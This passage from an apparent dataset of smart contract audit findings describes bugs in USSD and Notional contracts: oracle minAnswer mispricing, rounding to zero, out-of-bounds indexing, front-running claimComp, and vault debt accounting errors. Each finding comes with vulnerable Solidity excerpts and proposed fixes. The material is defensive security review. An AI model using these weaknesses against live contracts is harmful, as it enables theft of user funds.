}\\n}\\n```\\n\\nThe problem is in the `else branch` of the first if statement `collateralval > amountToBuyLeftUSD`, which lacks the check `if (collateral[i].pathsell.length > 0)`",Handle the case as is done in the if branch of collateralval > amountToBuyLeftUSD:\\n```\\nif (collateral[i].pathsell.length > 0) {\\n // Sell collateral for DAI\\n}\\nelse {\\n // No need to swap 
DAI\\n}\\n```\\n,A re-balancing on a peg-down recovery will fail if the `collateralval` of DAI is less than `amountToBuyLeftUSD` but greater than `amountToBuyLeftUSD / 20` since the DAI collateral does not have a sell path.,"```\\nif (collateralval > amountToBuyLeftUSD) {\\n // sell a portion of collateral and exit\\n if (collateral[i].pathsell.length > 0) {\\n uint256 amountBefore = IERC20Upgradeable(baseAsset).balanceOf(USSD);\\n uint256 amountToSellUnits = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * ((amountToBuyLeftUSD * 1e18 / collateralval) / 1e18) / 1e18;\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathsell, amountToSellUnits);\\n amountToBuyLeftUSD -= (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n DAItosell += (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n } \\n else {\\n // no need to swap DAI\\n DAItosell = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * amountToBuyLeftUSD / collateralval;\\n }\\n}\\n\\nelse {\\n // @audit-issue Not handling the case where this is DAI as is done above.\\n // sell all or skip (if collateral is too little, 5% treshold)\\n if (collateralval >= amountToBuyLeftUSD / 20) {\\n uint256 amountBefore = IERC20Upgradeable(baseAsset).balanceOf(USSD);\\n // sell all collateral and move to next one\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathsell, IERC20Upgradeable(collateral[i].token).balanceOf(USSD));\\n amountToBuyLeftUSD -= (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n DAItosell += (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n }\\n}\\n```\\n" +Risk of Incorrect Asset Pricing by StableOracle in Case of Underlying Aggregator Reaching minAnswer,medium,"Chainlink aggregators have a built-in circuit breaker to prevent the price of an asset from deviating outside a predefined price range. 
This circuit breaker may cause the oracle to persistently return the minPrice instead of the actual asset price in the event of a significant price drop, as witnessed during the LUNA crash.\\nStableOracleDAI.sol, StableOracleWBTC.sol, and StableOracleWETH.sol utilize the ChainlinkFeedRegistry to fetch the price of the requested tokens.\\n```\\nfunction latestRoundData(\\n address base,\\n address quote\\n)\\n external\\n view\\n override\\n checkPairAccess()\\n returns (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 answeredInRound\\n )\\n{\\n uint16 currentPhaseId = s_currentPhaseId[base][quote];\\n AggregatorV2V3Interface aggregator = _getFeed(base, quote);\\n require(address(aggregator) != address(0), ""Feed not found"");\\n (\\n roundId,\\n answer,\\n startedAt,\\n updatedAt,\\n answeredInRound\\n ) = aggregator.latestRoundData();\\n return _addPhaseIds(roundId, answer, startedAt, updatedAt, answeredInRound, currentPhaseId);\\n}\\n```\\n\\nChainlinkFeedRegistry#latestRoundData extracts the linked aggregator and requests round data from it. If an asset's price falls below the minPrice, the protocol continues to value the token at the minPrice rather than its real value. This discrepancy could have the protocol end up minting drastically larger amount of stableCoinAmount as well as returning a much bigger collateral factor.\\nFor instance, if TokenA's minPrice is $1 and its price falls to $0.10, the aggregator continues to report $1, rendering the related function calls to entail a value that is ten times the actual value.\\nIt's important to note that while Chainlink oracles form part of the OracleAggregator system and the use of a combination of oracles could potentially prevent such a situation, there's still a risk. Secondary oracles, such as Band, could potentially be exploited by a malicious user who can DDOS relayers to prevent price updates. 
Once the price becomes stale, the Chainlink oracle's price would be the sole reference, posing a significant risk.","StableOracle should cross-check the returned answer against the minPrice/maxPrice and revert if the answer is outside of these bounds:\\n```\\n (, int256 price, , uint256 updatedAt, ) = registry.latestRoundData(\\n token,\\n USD\\n );\\n \\n if (price >= maxPrice or price <= minPrice) revert();\\n```\\n\\nThis ensures that a false price will not be returned if the underlying asset's value hits the minPrice.","In the event of an asset crash (like LUNA), the protocol can be manipulated to handle calls at an inflated price.","```\\nfunction latestRoundData(\\n address base,\\n address quote\\n)\\n external\\n view\\n override\\n checkPairAccess()\\n returns (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 answeredInRound\\n )\\n{\\n uint16 currentPhaseId = s_currentPhaseId[base][quote];\\n AggregatorV2V3Interface aggregator = _getFeed(base, quote);\\n require(address(aggregator) != address(0), ""Feed not found"");\\n (\\n roundId,\\n answer,\\n startedAt,\\n updatedAt,\\n answeredInRound\\n ) = aggregator.latestRoundData();\\n return _addPhaseIds(roundId, answer, startedAt, updatedAt, answeredInRound, currentPhaseId);\\n}\\n```\\n" +`BuyUSSDSellCollateral()` always sells 0 amount if need to sell part of collateral,medium,"Due to rounding error there is misbehaviour in `BuyUSSDSellCollateral()` function. 
It results in selling 0 amount of collateral.\\nSuppose the only collateral in protocol is 1 WBTC; 1 WBTC costs 30_000 USD; UniV3Pool DAI/ USSD has following liquidity: (3000e6 USSD, 2000e18 DAI) And also USSD is underpriced so call rebalance:\\n```\\n function rebalance() override public {\\n uint256 ownval = getOwnValuation(); // it low enough to dive into if statement (see line below) \\n (uint256 USSDamount, uint256 DAIamount) = getSupplyProportion(); // (3000e6 USSD, 2000e18 DAI)\\n if (ownval < 1e6 - threshold) {\\n // peg-down recovery\\n BuyUSSDSellCollateral((USSDamount - DAIamount / 1e12)/2); // 500 * 1e6 = (3000e6 - 2000e18 / 1e12) / 2\\n```\\n\\nTake a look into BuyUSSDSellCollateral (follow comments):\\n```\\n function BuyUSSDSellCollateral(uint256 amountToBuy) internal { // 500e6\\n CollateralInfo[] memory collateral = IUSSD(USSD).collateralList();\\n //uint amountToBuyLeftUSD = amountToBuy * 1e12 * 1e6 / getOwnValuation();\\n uint amountToBuyLeftUSD = amountToBuy * 1e12; // 500e18\\n uint DAItosell = 0;\\n // Sell collateral in order of collateral array\\n for (uint256 i = 0; i < collateral.length; i++) {\\n // 30_000e18 = 1e8 * 1e18 / 10**8 * 30_000e18 / 1e18\\n uint256 collateralval = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * 1e18 / (10**IERC20MetadataUpgradeable(collateral[i].token).decimals()) * collateral[i].oracle.getPriceUSD() / 1e18;\\n if (collateralval > amountToBuyLeftUSD) {\\n // sell a portion of collateral and exit\\n if (collateral[i].pathsell.length > 0) {\\n uint256 amountBefore = IERC20Upgradeable(baseAsset).balanceOf(USSD); // 0\\n // amountToSellUnits = 1e8 * ((500e18 * 1e18 / 30_000e18) / 1e18) / 1e18 = 1e8 * (0) / 1e18 = 0\\n uint256 amountToSellUnits = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * ((amountToBuyLeftUSD * 1e18 / collateralval) / 1e18) / 1e18;\\n // and finally executes trade of 0 WBTC\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathsell, amountToSellUnits);\\n amountToBuyLeftUSD -= 
(IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore); // 0 = 0 - 0\\n DAItosell += (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore); // 0 += 0\\n // rest of code\\n```\\n\\nSo protocol will not buy DAI and will not sell DAI for USSD in UniswapV3Pool to support peg of USSD to DAI",Refactor formula of amountToSellUnits\\n```\\n// uint256 amountToSellUnits = (decimals of collateral) * (DAI amount to get for sell) / (price of 1 token of collateral)\\nuint256 amountToSellUnits = collateral[i].token).decimals() * amountToBuyLeftUSD / collateral[i].oracle.getPriceUSD()\\n```\\n,Protocol is not able of partial selling of collateral for token. It block algorithmic pegging of USSD to DAI,"```\\n function rebalance() override public {\\n uint256 ownval = getOwnValuation(); // it low enough to dive into if statement (see line below) \\n (uint256 USSDamount, uint256 DAIamount) = getSupplyProportion(); // (3000e6 USSD, 2000e18 DAI)\\n if (ownval < 1e6 - threshold) {\\n // peg-down recovery\\n BuyUSSDSellCollateral((USSDamount - DAIamount / 1e12)/2); // 500 * 1e6 = (3000e6 - 2000e18 / 1e12) / 2\\n```\\n" +"If collateral factor is high enough, flutter ends up being out of bounds",medium,"In `USSDRebalancer` contract, function `SellUSSDBuyCollateral` will revert everytime a rebalance calls it, provided the collateral factor is greater than all the elements of the `flutterRatios` array.\\nFunction `SellUSSDBuyCollateral` calculates `flutter` as the lowest index of the `flutterRatios` array for which the collateral factor is smaller than the `flutter` ratio.\\n```\\nuint256 cf = IUSSD(USSD).collateralFactor();\\nuint256 flutter = 0;\\nfor (flutter = 0; flutter < flutterRatios.length; flutter++) {\\n if (cf < flutterRatios[flutter]) {\\n break;\\n }\\n}\\n```\\n\\nThe problem arises when, if collateral factor is greater than all flutter values, after the loop `flutter = flutterRatios.length`.\\nThis `flutter` value is used afterwards here:\\n```\\n// rest of 
code\\nif (collateralval * 1e18 / ownval < collateral[i].ratios[flutter]) {\\n portions++;\\n}\\n// rest of code\\n```\\n\\nAnd here:\\n```\\n// rest of code\\nif (collateralval * 1e18 / ownval < collateral[i].ratios[flutter]) {\\n if (collateral[i].token != uniPool.token0() || collateral[i].token != uniPool.token1()) {\\n // don't touch DAI if it's needed to be bought (it's already bought)\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathbuy, daibought/portions);\\n }\\n}\\n// rest of code\\n```\\n\\nAs we can see in the tests of the project, the flutterRatios array and the collateral `ratios` array are set to be of the same length, so if flutter = flutterRatios.length, any call to that index in the `ratios` array will revert with an index out of bounds.",When checking `collateral[i].ratios[flutter]` always check first that flutter is `< flutterRatios.length`.,"High, when the collateral factor reaches certain level, a rebalance that calls `SellUSSDBuyCollateral` will always revert.",```\\nuint256 cf = IUSSD(USSD).collateralFactor();\\nuint256 flutter = 0;\\nfor (flutter = 0; flutter < flutterRatios.length; flutter++) {\\n if (cf < flutterRatios[flutter]) {\\n break;\\n }\\n}\\n```\\n +claimCOMPAndTransfer() COMP may be locked into the contract,high,"Malicious users can keep front-run `claimCOMPAndTransfer()` to trigger `COMPTROLLER.claimComp()` first, causing `netBalance` in `claimCOMPAndTransfer()` to be 0 all the time, resulting in `COMP` not being transferred out and locked in the contract\\n`claimCOMPAndTransfer()` use for ""Claims COMP incentives earned and transfers to the treasury manager contract"" The code is as follows:\\n```\\n function claimCOMPAndTransfer(address[] calldata cTokens)\\n external\\n override\\n onlyManagerContract\\n nonReentrant\\n returns (uint256)\\n {\\n uint256 balanceBefore = COMP.balanceOf(address(this));\\n COMPTROLLER.claimComp(address(this), cTokens);\\n uint256 balanceAfter = COMP.balanceOf(address(this));\\n\\n // NOTE: the 
onlyManagerContract modifier prevents a transfer to address(0) here\\n uint256 netBalance = balanceAfter.sub(balanceBefore); //<-------@only transfer out `netBalance`\\n if (netBalance > 0) {\\n COMP.safeTransfer(msg.sender, netBalance);\\n }\\n\\n // NOTE: TreasuryManager contract will emit a COMPHarvested event\\n return netBalance;\\n```\\n\\nFrom the above code, we can see that this method only transfers out the difference value `netBalance`. But `COMPTROLLER.claimComp()` can be called by anyone; if a malicious user front-runs this transaction to trigger `COMPTROLLER.claimComp()` first, this will cause the `netBalance` to be 0 all the time, resulting in `COMP` not being transferred out and being locked in the contract.\\nThe following code is from `Comptroller.sol`\\n```\\n function claimComp(address holder, CToken[] memory cTokens) public { //<----------anyone can call it\\n address[] memory holders = new address[](1);\\n holders[0] = holder;\\n claimComp(holders, cTokens, true, true);\\n }\\n```\\n",Transfer all balances, not using `netBalance`,`COMP` may be locked into the contract,"```\\n function claimCOMPAndTransfer(address[] calldata cTokens)\\n external\\n override\\n onlyManagerContract\\n nonReentrant\\n returns (uint256)\\n {\\n uint256 balanceBefore = COMP.balanceOf(address(this));\\n COMPTROLLER.claimComp(address(this), cTokens);\\n uint256 balanceAfter = COMP.balanceOf(address(this));\\n\\n // NOTE: the onlyManagerContract modifier prevents a transfer to address(0) here\\n uint256 netBalance = balanceAfter.sub(balanceBefore); //<-------@only transfer out `netBalance`\\n if (netBalance > 0) {\\n COMP.safeTransfer(msg.sender, netBalance);\\n }\\n\\n // NOTE: TreasuryManager contract will emit a COMPHarvested event\\n return netBalance;\\n```\\n"
+repayAccountPrimeDebtAtSettlement() user lost residual cash,high,"in `repayAccountPrimeDebtAtSettlement()` Incorrect calculation of `primeCashRefund` value (always == 0) Resulting in the loss of the 
user's residual cash\\nwhen settling a Vault Account, Notional will execute settleVaultAccount()->repayAccountPrimeDebtAtSettlement(). In the `repayAccountPrimeDebtAtSettlement()` method, the residual amount will be refunded to the user. The code is as follows.\\n```\\n function repayAccountPrimeDebtAtSettlement(\\n PrimeRate memory pr,\\n VaultStateStorage storage primeVaultState,\\n uint16 currencyId,\\n address vault,\\n address account,\\n int256 accountPrimeCash,\\n int256 accountPrimeStorageValue\\n ) internal returns (int256 finalPrimeDebtStorageValue, bool didTransfer) {\\n// rest of code\\n\\n if (netPrimeDebtRepaid < 
accountPrimeStorageValue) {\\n // If the net debt change is greater than the debt held by the account, then only\\n // decrease the total prime debt by what is held by the account. The residual amount\\n // will be refunded to the account via a direct transfer.\\n netPrimeDebtChange = accountPrimeStorageValue;\\n finalPrimeDebtStorageValue = 0;\\n\\n int256 primeCashRefund = pr.convertFromUnderlying(\\n- pr.convertDebtStorageToUnderlying(netPrimeDebtChange.sub(accountPrimeStorageValue))\\n+ pr.convertDebtStorageToUnderlying(netPrimeDebtRepaid.sub(accountPrimeStorageValue)) \\n );\\n TokenHandler.withdrawPrimeCash(\\n account, currencyId, primeCashRefund, pr, false // ETH will be transferred natively\\n );\\n didTransfer = true;\\n } else {\\n```\\n","`primeCashRefund` always == 0 , user lost residual cash","```\\n function repayAccountPrimeDebtAtSettlement(\\n PrimeRate memory pr,\\n VaultStateStorage storage primeVaultState,\\n uint16 currencyId,\\n address vault,\\n address account,\\n int256 accountPrimeCash,\\n int256 accountPrimeStorageValue\\n ) internal returns (int256 finalPrimeDebtStorageValue, bool didTransfer) {\\n// rest of code\\n\\n if (netPrimeDebtRepaid < accountPrimeStorageValue) {\\n // If the net debt change is greater than the debt held by the account, then only\\n // decrease the total prime debt by what is held by the account. 
The residual amount\\n // will be refunded to the account via a direct transfer.\\n netPrimeDebtChange = accountPrimeStorageValue;\\n finalPrimeDebtStorageValue = 0;\\n\\n int256 primeCashRefund = pr.convertFromUnderlying(\\n pr.convertDebtStorageToUnderlying(netPrimeDebtChange.sub(accountPrimeStorageValue)) //<--------@audit always ==0\\n );\\n TokenHandler.withdrawPrimeCash(\\n account, currencyId, primeCashRefund, pr, false // ETH will be transferred natively\\n );\\n didTransfer = true;\\n } else {\\n```\\n" +`VaultAccountSecondaryDebtShareStorage.maturity` will be cleared prematurely,high,"`VaultAccountSecondaryDebtShareStorage.maturity` will be cleared prematurely during liquidation\\nIf both the `accountDebtOne` and `accountDebtTwo` of secondary currencies are zero, Notional will consider both debt shares to be cleared to zero, and the maturity will be cleared as well as shown below.\\n```\\nFile: VaultSecondaryBorrow.sol\\n function _setAccountMaturity(\\n VaultAccountSecondaryDebtShareStorage storage accountStorage,\\n int256 accountDebtOne,\\n int256 accountDebtTwo,\\n uint40 maturity\\n ) private {\\n if (accountDebtOne == 0 && accountDebtTwo == 0) {\\n // If both debt shares are cleared to zero, clear the maturity as well.\\n accountStorage.maturity = 0;\\n } else {\\n // In all other cases, set the account to the designated maturity\\n accountStorage.maturity = maturity;\\n }\\n }\\n```\\n\\n`VaultLiquidationAction.deleverageAccount` function\\nWithin the `VaultLiquidationAction.deleverageAccount` function, it will call the `_reduceAccountDebt` function.\\nReferring to the `_reduceAccountDebt` function below. Assume that the `currencyIndex` reference to a secondary currency. In this case, the else logic in Line 251 will be executed. An important point to take note of that is critical to understand this bug is that only ONE of the prime rates will be set as it assumes that the other prime rate will not be used (Refer to Line 252 - 255). 
However, this assumption is incorrect.\\nAssume that the `currencyIndex` is `1`. Then `netUnderlyingDebtOne` parameter will be set to a non-zero value (depositUnderlyingInternal) at Line 261 while `netUnderlyingDebtTwo` parameter will be set to zero at Line 262. This is because, in Line 263 of the `_reduceAccountDebt` function, the `pr[0]` will be set to the prime rate, while the `pr[1]` will be zero or empty. It will then proceed to call the `VaultSecondaryBorrow.updateAccountSecondaryDebt`\\n```\\nFile: VaultLiquidationAction.sol\\n function _reduceAccountDebt(\\n VaultConfig memory vaultConfig,\\n VaultState memory vaultState,\\n VaultAccount memory vaultAccount,\\n PrimeRate memory primeRate,\\n uint256 currencyIndex,\\n int256 depositUnderlyingInternal,\\n bool checkMinBorrow\\n ) private {\\n if (currencyIndex == 0) {\\n vaultAccount.updateAccountDebt(vaultState, depositUnderlyingInternal, 0);\\n vaultState.setVaultState(vaultConfig);\\n } else {\\n // Only set one of the prime rates, the other prime rate is not used since\\n // the net debt amount is set to zero\\n PrimeRate[2] memory pr;\\n pr[currencyIndex - 1] = primeRate;\\n\\n VaultSecondaryBorrow.updateAccountSecondaryDebt(\\n vaultConfig,\\n vaultAccount.account,\\n vaultAccount.maturity,\\n currencyIndex == 1 ? depositUnderlyingInternal : 0,\\n currencyIndex == 2 ? depositUnderlyingInternal : 0,\\n pr,\\n checkMinBorrow\\n );\\n }\\n }\\n```\\n\\nWithin the `updateAccountSecondaryDebt` function, at Line 272, assume that `accountStorage.accountDebtTwo` is `100`. However, since `pr[1]` is not initialized, the `VaultStateLib.readDebtStorageToUnderlying` will return a zero value and set the `accountDebtTwo` to zero.\\nAssume that the liquidator calls the `deleverageAccount` function to clear all the debt of the `currencyIndex` secondary currency. Line 274 will be executed, and `accountDebtOne` will be set to zero.\\nNote that at this point, both `accountDebtOne` and `accountDebtTwo` are zero. 
At Line 301, the `_setAccountMaturity` will set the `accountStorage.maturity = 0` , which clears the vault account's maturity.\\nAn important point here is that the liquidator did not clear the `accountDebtTwo`. Yet, `accountDebtTwo` became zero in memory during the execution and caused Notional to wrongly assume that both debt shares had been cleared to zero.\\n```\\nFile: VaultSecondaryBorrow.sol\\n function updateAccountSecondaryDebt(\\n VaultConfig memory vaultConfig,\\n address account,\\n uint256 maturity,\\n int256 netUnderlyingDebtOne,\\n int256 netUnderlyingDebtTwo,\\n PrimeRate[2] memory pr,\\n bool checkMinBorrow\\n ) internal {\\n VaultAccountSecondaryDebtShareStorage storage accountStorage = \\n LibStorage.getVaultAccountSecondaryDebtShare()[account][vaultConfig.vault];\\n // Check maturity\\n uint256 accountMaturity = accountStorage.maturity;\\n require(accountMaturity == maturity || accountMaturity == 0);\\n \\n int256 accountDebtOne = VaultStateLib.readDebtStorageToUnderlying(pr[0], maturity, accountStorage.accountDebtOne); \\n int256 accountDebtTwo = VaultStateLib.readDebtStorageToUnderlying(pr[1], maturity, accountStorage.accountDebtTwo);\\n if (netUnderlyingDebtOne != 0) {\\n accountDebtOne = accountDebtOne.add(netUnderlyingDebtOne);\\n\\n _updateTotalSecondaryDebt(\\n vaultConfig, account, vaultConfig.secondaryBorrowCurrencies[0], maturity, netUnderlyingDebtOne, pr[0]\\n );\\n\\n accountStorage.accountDebtOne = VaultStateLib.calculateDebtStorage(pr[0], maturity, accountDebtOne)\\n .neg().toUint().toUint80();\\n }\\n\\n if (netUnderlyingDebtTwo != 0) {\\n accountDebtTwo = accountDebtTwo.add(netUnderlyingDebtTwo);\\n\\n _updateTotalSecondaryDebt(\\n vaultConfig, account, vaultConfig.secondaryBorrowCurrencies[1], maturity, netUnderlyingDebtTwo, pr[1]\\n );\\n\\n accountStorage.accountDebtTwo = VaultStateLib.calculateDebtStorage(pr[1], maturity, accountDebtTwo)\\n .neg().toUint().toUint80();\\n }\\n\\n if (checkMinBorrow) {\\n // No overflow on 
negation due to overflow checks above\\n require(accountDebtOne == 0 || vaultConfig.minAccountSecondaryBorrow[0] <= -accountDebtOne, ""min borrow"");\\n require(accountDebtTwo == 0 || vaultConfig.minAccountSecondaryBorrow[1] <= -accountDebtTwo, ""min borrow"");\\n }\\n\\n _setAccountMaturity(accountStorage, accountDebtOne, accountDebtTwo, maturity.toUint40());\\n }\\n```\\n\\nThe final state will be `VaultAccountSecondaryDebtShareStorage` as follows:\\n`maturity` and `accountDebtOne` are zero\\n`accountDebtTwo` = 100\\n```\\nstruct VaultAccountSecondaryDebtShareStorage {\\n // Maturity for the account's secondary borrows. This is stored separately from\\n // the vault account maturity to ensure that we have access to the proper state\\n // during a roll borrow position. It should never be allowed to deviate from the\\n // vaultAccount.maturity value (unless it is cleared to zero).\\n uint40 maturity;\\n // Account debt for the first secondary currency in either fCash or pCash denomination\\n uint80 accountDebtOne;\\n // Account debt for the second secondary currency in either fCash or pCash denomination\\n uint80 accountDebtTwo;\\n}\\n```\\n\\nFirstly, it does not make sense to have `accountDebtTwo` but no `maturity` in storage, which also means the vault account data is corrupted. Secondly, when `maturity` is zero, it also means that the vault account did not borrow anything from Notional. Lastly, many vault logic would break since it relies on the `maturity` value.\\n`VaultLiquidationAction.liquidateVaultCashBalance` function\\nThe root cause lies in the implementation of the `_reduceAccountDebt` function. 
Since `liquidateVaultCashBalance` function calls the `_reduceAccountDebt` function to reduce the debt of the vault account being liquidated, the same issue will occur here.","Fetch the prime rate of both secondary currencies because they are both needed within the `updateAccountSecondaryDebt` function when converting debt storage to underlying.\\n```\\n function _reduceAccountDebt(\\n VaultConfig memory vaultConfig,\\n VaultState memory vaultState,\\n VaultAccount memory vaultAccount,\\n PrimeRate memory primeRate,\\n uint256 currencyIndex,\\n int256 depositUnderlyingInternal,\\n bool checkMinBorrow\\n ) private {\\n if (currencyIndex == 0) {\\n vaultAccount.updateAccountDebt(vaultState, depositUnderlyingInternal, 0);\\n vaultState.setVaultState(vaultConfig);\\n } else {\\n // Only set one of the prime rates, the other prime rate is not used since\\n // the net debt amount is set to zero\\n PrimeRate[2] memory pr;\\n// Remove the line below\\n pr[currencyIndex // Remove the line below\\n 1] = primeRate;\\n// Add the line below\\n pr = VaultSecondaryBorrow.getSecondaryPrimeRateStateful(vaultConfig);\\n\\n VaultSecondaryBorrow.updateAccountSecondaryDebt(\\n vaultConfig,\\n vaultAccount.account,\\n vaultAccount.maturity,\\n currencyIndex == 1 ? depositUnderlyingInternal : 0,\\n currencyIndex == 2 ? depositUnderlyingInternal : 0,\\n pr,\\n checkMinBorrow\\n );\\n }\\n }\\n```\\n","Any vault logic that relies on the VaultAccountSecondaryDebtShareStorage's maturity value would break since it has been cleared (set to zero). For instance, a vault account cannot be settled anymore as the following `settleSecondaryBorrow` function will always revert. Since `storedMaturity == 0` but `accountDebtTwo` is not zero, Line 399 below will always revert.\\nAs a result, a vault account with secondary currency debt cannot be settled. 
This also means that the vault account cannot exit since a vault account needs to be settled before exiting, causing users' assets to be stuck within the protocol.\\n```\\nFile: VaultSecondaryBorrow.sol\\n function settleSecondaryBorrow(VaultConfig memory vaultConfig, address account) internal returns (bool) {\\n if (!vaultConfig.hasSecondaryBorrows()) return false;\\n\\n VaultAccountSecondaryDebtShareStorage storage accountStorage = \\n LibStorage.getVaultAccountSecondaryDebtShare()[account][vaultConfig.vault];\\n uint256 storedMaturity = accountStorage.maturity;\\n\\n // NOTE: we can read account debt directly since prime cash maturities never enter this block of code.\\n int256 accountDebtOne = -int256(uint256(accountStorage.accountDebtOne));\\n int256 accountDebtTwo = -int256(uint256(accountStorage.accountDebtTwo));\\n \\n if (storedMaturity == 0) {\\n // Handles edge condition where an account is holding vault shares past maturity without\\n // any debt position.\\n require(accountDebtOne == 0 && accountDebtTwo == 0); \\n } else {\\n```\\n\\nIn addition, the vault account data is corrupted as there is a secondary debt without maturity, which might affect internal accounting and tracking.","```\\nFile: VaultSecondaryBorrow.sol\\n function _setAccountMaturity(\\n VaultAccountSecondaryDebtShareStorage storage accountStorage,\\n int256 accountDebtOne,\\n int256 accountDebtTwo,\\n uint40 maturity\\n ) private {\\n if (accountDebtOne == 0 && accountDebtTwo == 0) {\\n // If both debt shares are cleared to zero, clear the maturity as well.\\n accountStorage.maturity = 0;\\n } else {\\n // In all other cases, set the account to the designated maturity\\n accountStorage.maturity = maturity;\\n }\\n }\\n```\\n" +StrategyVault can perform a full exit without repaying all secondary debt,high,"StrategyVault can perform a full exit without repaying all secondary debt, leaving bad debt with the protocol.\\nNoted from the codebase's comment that:\\nVaults can borrow up to the 
capacity using the `borrowSecondaryCurrencyToVault` and `repaySecondaryCurrencyToVault` methods. Vaults that use a secondary currency must ALWAYS repay the secondary debt during redemption and handle accounting for the secondary currency themselves.\\nThus, when the StrategyVault-side performs a full exit for a vault account, Notional-side does not check that all secondary debts of that vault account are cleared (= zero) and will simply trust StrategyVault-side has already handled them properly.\\nLine 271 below shows that only validates the primary debt but not the secondary debt during a full exit.\\n```\\nFile: VaultAccountAction.sol\\n if (vaultAccount.accountDebtUnderlying == 0 && vaultAccount.vaultShares == 0) {\\n // If the account has no position in the vault at this point, set the maturity to zero as well\\n vaultAccount.maturity = 0;\\n }\\n vaultAccount.setVaultAccount({vaultConfig: vaultConfig, checkMinBorrow: true});\\n\\n // It's possible that the user redeems more vault shares than they lend (it is not always the case\\n // that they will be increasing their collateral ratio here, so we check that this is the case). 
No\\n // need to check if the account has exited in full (maturity == 0).\\n if (vaultAccount.maturity != 0) {\\n IVaultAccountHealth(address(this)).checkVaultAccountCollateralRatio(vault, account);\\n }\\n```\\n","Consider checking that all secondary debts of a vault account are cleared before executing a full exit.\\n```\\n// Add the line below\\n int256 accountDebtOne;\\n// Add the line below\\n int256 accountDebtTwo;\\n\\n// Add the line below\\n if (vaultConfig.hasSecondaryBorrows()) {\\n// Add the line below\\n (/* */, accountDebtOne, accountDebtTwo) = VaultSecondaryBorrow.getAccountSecondaryDebt(vaultConfig, account, pr);\\n// Add the line below\\n }\\n\\n// Remove the line below\\n if (vaultAccount.accountDebtUnderlying == 0 && vaultAccount.vaultShares == 0) {\\n// Add the line below\\n if (vaultAccount.accountDebtUnderlying == 0 && vaultAccount.vaultShares == 0 && accountDebtOne == 0 && accountDebtTwo == 0) {\\n // If the account has no position in the vault at this point, set the maturity to zero as well\\n vaultAccount.maturity = 0;\\n}\\nvaultAccount.setVaultAccount({vaultConfig: vaultConfig, checkMinBorrow: true});\\n```\\n","Leveraged vaults are designed to be as isolated as possible to mitigate the risk to the Notional protocol and its users. However, the above implementation seems to break this principle. 
As such, if there is a vulnerability in the leverage vault that allows someone to exploit this issue and bypass the repayment of the secondary debt, the protocol will be left with a bad debt which affects the insolvency of the protocol.","```\\nFile: VaultAccountAction.sol\\n if (vaultAccount.accountDebtUnderlying == 0 && vaultAccount.vaultShares == 0) {\\n // If the account has no position in the vault at this point, set the maturity to zero as well\\n vaultAccount.maturity = 0;\\n }\\n vaultAccount.setVaultAccount({vaultConfig: vaultConfig, checkMinBorrow: true});\\n\\n // It's possible that the user redeems more vault shares than they lend (it is not always the case\\n // that they will be increasing their collateral ratio here, so we check that this is the case). No\\n // need to check if the account has exited in full (maturity == 0).\\n if (vaultAccount.maturity != 0) {\\n IVaultAccountHealth(address(this)).checkVaultAccountCollateralRatio(vault, account);\\n }\\n```\\n" +Unable to transfer fee reserve assets to treasury,high,"Transferring fee reserve assets to the treasury manager contract will result in a revert, leading to a loss of rewards for NOTE stakers.\\n```\\nFile: TreasuryAction.sol\\n /// @notice redeems and transfers tokens to the treasury manager contract\\n function _redeemAndTransfer(uint16 currencyId, int256 primeCashRedeemAmount) private returns (uint256) {\\n PrimeRate memory primeRate = PrimeRateLib.buildPrimeRateStateful(currencyId);\\n int256 actualTransferExternal = TokenHandler.withdrawPrimeCash(\\n treasuryManagerContract,\\n currencyId,\\n primeCashRedeemAmount.neg(),\\n primeRate,\\n true // if ETH, transfers it as WETH\\n );\\n\\n require(actualTransferExternal > 0);\\n return uint256(actualTransferExternal);\\n }\\n```\\n\\nThe value returned by the `TokenHandler.withdrawPrimeCash` function is always less than or equal to zero. 
Thus, the condition `actualTransferExternal > 0` will always be false, and the `_redeemAndTransfer` function will always revert.\\nThe `transferReserveToTreasury` function depends on `_redeemAndTransfer` function. Thus, it is not possible to transfer any asset to the treasury manager contract.","Negate the value returned by the `TokenHandler.withdrawPrimeCash` function.\\n```\\n int256 actualTransferExternal = TokenHandler.withdrawPrimeCash(\\n treasuryManagerContract,\\n currencyId,\\n primeCashRedeemAmount.neg(),\\n primeRate,\\n true // if ETH, transfers it as WETH\\n// Remove the line below\\n );\\n// Add the line below\\n ).neg();\\n```\\n","The fee collected by Notional is stored in the Fee Reserve. The fee reserve assets will be transferred to Notional's Treasury to be invested into the sNOTE pool. Without the ability to do so, the NOTE stakers will not receive their rewards.","```\\nFile: TreasuryAction.sol\\n /// @notice redeems and transfers tokens to the treasury manager contract\\n function _redeemAndTransfer(uint16 currencyId, int256 primeCashRedeemAmount) private returns (uint256) {\\n PrimeRate memory primeRate = PrimeRateLib.buildPrimeRateStateful(currencyId);\\n int256 actualTransferExternal = TokenHandler.withdrawPrimeCash(\\n treasuryManagerContract,\\n currencyId,\\n primeCashRedeemAmount.neg(),\\n primeRate,\\n true // if ETH, transfers it as WETH\\n );\\n\\n require(actualTransferExternal > 0);\\n return uint256(actualTransferExternal);\\n }\\n```\\n" +Excess funds withdrawn from the money market,high,"Excessive amounts of assets are being withdrawn from the money market.\\n```\\nFile: TokenHandler.sol\\n function _redeemMoneyMarketIfRequired(\\n uint16 currencyId,\\n Token memory underlying,\\n uint256 withdrawAmountExternal\\n ) private {\\n // If there is sufficient balance of the underlying to withdraw from the contract\\n // immediately, just return.\\n mapping(address => uint256) storage store = LibStorage.getStoredTokenBalances();\\n 
